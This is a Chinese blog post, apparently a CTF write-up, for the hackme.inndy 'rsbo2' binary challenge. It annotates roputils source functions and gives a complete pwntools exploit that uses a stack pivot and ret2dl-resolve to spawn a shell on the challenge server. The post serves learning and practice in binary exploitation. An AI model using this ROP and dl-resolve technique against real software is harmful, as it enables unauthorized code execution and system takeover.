hackme.inndy rsbo2 经验总结

最新推荐文章于 2021-03-10 19:45:55 发布
最新推荐文章于 2021-03-10 19:45:55 发布
阅读量301 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/98762766
版权

这题想用retdl-resolve 来解题,可是自己手写的脚本过不了,搜过其他的wp,发现有很多种解法,利用DynELF泄露libc地址, 或利用write直接泄露libc地址(题目给了libc),但是我就是想用栈迁移和retdl-resolve解题,但是搜到的wp几乎都用了roputils工具,这工具我不会用也没搜到什么教程,然后经过一段时间的无能狂怒之后最后决定求人不如求己,自己去看roputils的源码自己钻
roputils源码

参考的wp:
https://blog.csdn.net/charlie_heng/article/details/78947199

1.rop.fill()
源代码如下:

    def fill(self, size, buf=''):
        chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
        buflen = size - len(buf)
        assert buflen >= 0, "%d bytes over" % (-buflen,)
        return ''.join(random.choice(chars) for i in xrange(buflen))

作用比较好理解,就是在buf后面添加字符,知道buf的长度达到size为止
例子:
在这里插入图片描述
2.rop.call()
源代码如下:

    def call(self, addr, *args):
        if isinstance(addr, str):
            addr = self.plt(addr)

        buf = self.p(addr)  //要调用的函数的地址
        buf += self.p(self.gadget('pop', n=len(args))) //类似于pppr的gadget,不过参数不确定,所以n=len(args), 最后会把该函数的参数全部弹出,rop.call()后面的即是返回地址
        buf += self.p(args)  //该函数的参数
        return buf

3.rop.dl_resolve_call()
源码如下:

    def align(self, addr, origin, size):    //数据对齐
        padlen = size - ((addr-origin) % size)  
        return (addr+padlen, padlen)

   def plt(self, name=None):
        if name:
            return self.offset(self._plt[name])
        else:
            return self.offset(self._section['.plt'][0])

    def dl_resolve_call(self, base, *args):
        jmprel = self.dynamic('JMPREL')
        relent = self.dynamic('RELENT')

        addr_reloc, padlen_reloc = self.align(base, jmprel, relent)
        reloc_offset = addr_reloc - jmprel

        buf = self.p(self.plt())   //在这里是plt表头的地址
        buf += self.p(reloc_offset)  //REL.PLT表距bss段的偏移
        buf += self.p(self.gadget('pop', n=len(args))) //system 函数的返回地址
        buf += self.p(args)  //'/bin/sh\0' 的地址

        return buf

base 参数是 伪造的.rel.plt 表项数据的地址
*args 参数是 /bin/sh\0 的地址

4.dl_resolve_data()
源代码如下:

    def dl_resolve_data(self, base, name):
        jmprel = self.dynamic('JMPREL')
        relent = self.dynamic('RELENT')
        symtab = self.dynamic('SYMTAB')
        syment = self.dynamic('SYMENT')
        strtab = self.dynamic('STRTAB')

        addr_reloc, padlen_reloc = self.align(base, jmprel, relent)
        addr_sym, padlen_sym = self.align(addr_reloc+relent, symtab, syment)
        addr_symstr = addr_sym + syment

        r_info = (((addr_sym - symtab) / syment) << 8) | 0x7
        st_name = addr_symstr - strtab

        buf = self.fill(padlen_reloc)  #由于数据对齐会导致数据产生偏移,在这里填充这个偏移来消除误差
        buf += struct.pack('<II', base, r_info)                      # Elf32_Rel
        buf += self.fill(padlen_sym)
        buf += struct.pack('<IIII', st_name, 0, 0, 0x12)             # Elf32_Sym
        buf += self.string(name)

        return buf

看代码可以看出是伪造关于动态链接的数据

最后是根据理解模仿的exp:
我觉得那个大佬的栈迁移对我来说有点绕,所以我改了一下,有点啰嗦但是觉得好理解

另外后面有些地方rop.fill()没用0x80 填充是因为read函数 会读取 0x80 个字符,用0x7f填充,加上后面的p.sendline() 的换行符就刚好0x80 个字符了

另外这题还有个不理解的地方
他们说用\x00 填充的原因是覆盖 v8的值好跳出for循环,但是仔细一想即使先覆盖了v8的值为0, 而v8被赋予的是read_80_bytes 函数的返回值,所以v8的值还是read函数实际读取的字符,并不会马上跳出循环,但是奇怪的是不用\x00 填充用’a’填充 在rsbo 中无法getflag,如果有知道的人麻烦告诉我一下,谢谢

from pwn import *
import roputils as rp

context(arch='i386', os='linux', log_level='debug')
#p = process("./rsbo2")
p = remote("hackme.inndy.tw", 7706)
rop = rp.ROP("./rsbo2")
elf = ELF("./rsbo2")

offset = 0x68
bss = elf.bss() + 0x800
plt_read = elf.plt['read']
start = 0x08048490
leaveret = 0x08048733

payload = '\x00'*(offset + 4) + p32(plt_read) + p32(start) + p32(0) + p32(bss) + p32(0x80)
p.send(payload)

rop_data = 'a'*0x4 + rop.call('read', 0, bss+180, 0x80) + rop.dl_resolve_call(bss+200, bss+180)
rop_data += rop.fill(0x7f, rop_data)
sleep(2)
p.sendline(rop_data)

payload = '\x00'*offset + p32(bss) + p32(leaveret) + (0x80 - len(payload))*'a'
sleep(2)
p.send(payload)

bss_data = '/bin/sh\0'
bss_data += rop.fill(20, bss_data)
bss_data += rop.dl_resolve_data(bss+200, 'system')
bss_data += rop.fill(0x7f, bss_data)
sleep(2)
p.sendline(bss_data)

p.interactive()

结果:
在这里插入图片描述

苍崎青子
关注
专栏目录
SAP 生产订单修改记录查询
我小时候很黑的博客
04-27 5063
无论在项目实施过程中还是在运维的项目中,经常会遇到生产订单被修改,导致需求发生变更,这个时候用户经常就会需要要求查询生产订单的修改记录
hackme inndy pwn rsbo writeup
charlie_heng的专栏
01-01 646
因为rsbo和rsbo2是同一题,所以就直接做rsbo2了 首先看看程序 init函数那里用时间和flag生成了一个seed,所以不能预测rand产生的值 然后是读了0x80个byte,这里有一个栈溢出 但是接下来那个for循环就有点棘手了,想了半天想不到,就去看了下别人的wp,发现是送了104个字节的\x00,这里这样做的原因是当修改到v8的值的时候,可以修改为0,这样就跳出for循...
ret2dl_resolve 知识点总结
qq_43189757的博客
07-11 416
ret2dl-resole 是通过伪造到 .rel.plt , .dynsym, .dynstr中表项中的偏移以及伪造这三个段中的数据结构来达到调用system 函数的目的 这三个段的信息都可以在IDA中 DYNAMIC 段中找到 DT_STRTAB -> .dynstr DT_SYMTAB -> .dynsym DT_JMPREL -> .rel.plt...
Ret2dl_resolve学习笔记
sopora的博客
06-17 824
ret2dl_resolve的原理: 动态链接相关函数_dl_runtime_resolve(link_map_obj, reloc_index) 功能:在第一次调用某函数时运行,绑定其地址到对应的GOT表项 第一个参数link_map_obj恒为GOT[1]的地址 第二个参数reloc_index为被绑定函数在.rel.plt段中的相对偏移 原理: 调用_dl_runtime_...
32k通过地址跳转到函数_通过一道pwn题详细分析retdlresolve技术
weixin_26731219的博客
01-03 172
本文为看雪论坛精华文章看雪论坛作者ID:笔墨基础知识本文涉及到的ELF节以及相关结构如下:1、.rel.plt节是用于函数重定位,.rel.dyn节是用于变量重定位。.rel.plt节相关的Elf32_Rel结构如下:typedef struct { Elf32_Addr r_offset; // 对于可执行文件,此值为虚拟地址 Elf32_Word r_info; // 符号表索...
PWN入门之栈溢出之ret2dlresolve
weixin_44681716的博客
05-03 1076
实验目的 当一个程序第一次调用libc中的函数时,必须首先对libc中函数的真实地址进行重定位,而这个绑定寻找真实地址的过程由dl_runtime_resolve完成。 dl_runtime_resolve需要两个参数,一个是link_map=*(GOT[1]),即链接器标志信息和reloc_arg(标志该函数重定位入口偏移),我们需要做的就是控制reloc_arg从而使dl_runtime_re...
hackme.inndy.tw的一些Writeup(5月30更新)
热门推荐
baikeng3674的博客
10-21 2万+
hackme.inndy.tw的一些Writeup(6月3日更新) 原文链接:http://www.cnblogs.com/WangAoBo/p/7706719.html 推荐一下https://hackme.inndy.tw/scoreboard/,上边有一些很好的针对新手的题目,但网上能搜到的Writeup很少,因此开了这篇博文记录一下部分目前解出的题目(主要是pwn和r...
基于OAuth2.O的资源共享机制RSBO (2012年)
05-07
本文针这些问题,提出了一种基于OAuth2.0协议的资源共享机制RSBO(Resource Sharing based OAuth2.0)并对其进行阐述,RSBO利用OAuth2.0协议认证授权的访问令牌原理,为共享资源创建资源令牌,该机制解决了用户信息泄露及...
rsbo-1和rsbo-2的writeup
zszcr的博客
04-22 501
rsdo和rsdo-2writeup 这两道题的文件是一样的,不过一个没要求getshell,一个要求getshll 先说rsdo 防护机制 只开启了堆栈不可执行 题目hint: ROP, open, read 很明显要要用ROP调用执行open()函数打开flag文件 然后用read()函数读取文件 ida反编译代码 ** 它先执行init函数 ,打开“/home/ct...
SAP BW学习资料
09-03
26. RSBO:旧的Infospoke/OpenHub维护T-Code。 27. RSCRM_BAPI:生成查询提取,为分析过程设计器(APD)提供基础。 28. RSCUSTA:维护BW设置,包括系统配置和个性化选项。 29. RSCUSTA2:ODS设置,专门针对操作...
栈溢出利用之return to dl-resolve实例
M021的专栏
10-07 3528
最近学习了一下漏洞原理与利用,学习到栈溢出漏洞利用的一些技巧,记录下自己的学习心得。关于return to dl-resolve的原理,网上有许多的文章已经写的很清楚了,就不赘述。本文主要是根据return to dl-resolve的原理,实现32位和64位环境下的漏洞利用。
一种比较麻烦的Rop链构造——ret2dlresolve
dydxdz的博客
04-09 3835
ret2resolve 题目:0ctf 2018 babystack 上周末做了TCTF(0ctf 2018)的新人赛,题目难度适中,但垃圾如我一如既往没有做出几道题。在7o8v大佬的帮助下,弄懂了babystack的考察点和ret2resolve的利用原理,因此对照着wp记录一波。 0x01 ret2dlresolve原理 当一个程序第一次调用libc中的函数时,必须首先对libc中...
linux的防护机制
zszcr的博客
03-22 1255
1、NX/DEP:堆栈不可执行 ,将数据所在的内存页标识为不可执行,当程序试图在数据页面执行指令时,cpu就会抛出异常绕过方法:ROP ret2libc关闭NX:gcc -z execstack -o pwn pwn.c2、Cannry:(栈保护)当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在...
ret2dlresolve超详细教程(x86&x64)
qq_51868336的博客
03-10 5260
X86 前置知识 在Linux中,程序使用_dl_runtime_resolve(link_map,reloc_offset)来对动态链接的函数进行重定位。 而ret2dlresolve攻击的核心就是控制相应的参数及其对应地址的内容,从而控制解析的函数。 延迟绑定 第一次调用一个函数时,先是到plt表,然后jmp到got表 此时got表存的地址是在plt表上 其实也就是jmp got的下一条指令,这里先是push一个数字(该函数在rel.plt上的偏移,reloc_arg,后文会讲到),然后jmp到pl
【CTF】32位/64位dlresolve最全总结(无地址泄露执行one_gadget)
panhewu9919的博客
09-05 2025
利用dl_resolve执行libc内任意gadget(不需泄露libc地址) 实验代码下载地址:https://github.com/bsauce/CTF/tree/master/dl_resolve_64 分析:0CTF的题目blackhole2,很简单的栈溢出,但是远程不允许回显,所以不能泄露libc_base,不能返回shell。程序本身所含有的gadget有限,所以能不能不泄露libc_...
ret2dlresolve利用方法
九层台
05-10 2383
使用场景: 一遍运行(延迟绑定技术,只有在第一次调用该函数时才会调用_dll_runtime_resolve函数) 没有输出,没有system函数。 需要: 1.向一个固定地址写入数据(bss段) 2.能够劫持程序执行流 linux下c函数是放在libc库里面的 ldd pwn01 linux-gate.so.1 => (0xf7ef2000) libc.s...
stack overflow ROP
我多么希望明天有太阳,来灼烧我腐烂的梦想
09-05 403
ROP: Return Oriented Programming CTFs -fno-stack-protector 指的是不开启堆栈溢出保护,即不生成 canary。 checksec stack_example Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found N...
CTF-PWN相关程序素材积累
weixin_41038905的博客
04-21 436
PWN简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。pwn是一个黑客语法的俚语词 ,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵Linux下的pwn常用到的工具有: gdb:Linux调试中必要用到的 gdb-peda:gdb方便调试的工具,类似的工具有gef,gdbinit,这些...
BUUCTF ciscn_2019_c_1 write up
qq_43189757的博客
09-06 4891
分析: 程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中 在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密 1.如果是小写字母跟0xD异或 2.如果是大写字母跟0xE异或 3.如果是数字跟0xF异或 在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据 二进制文件中没有出现getshell和system之类的函数,所以要通...
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3047
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值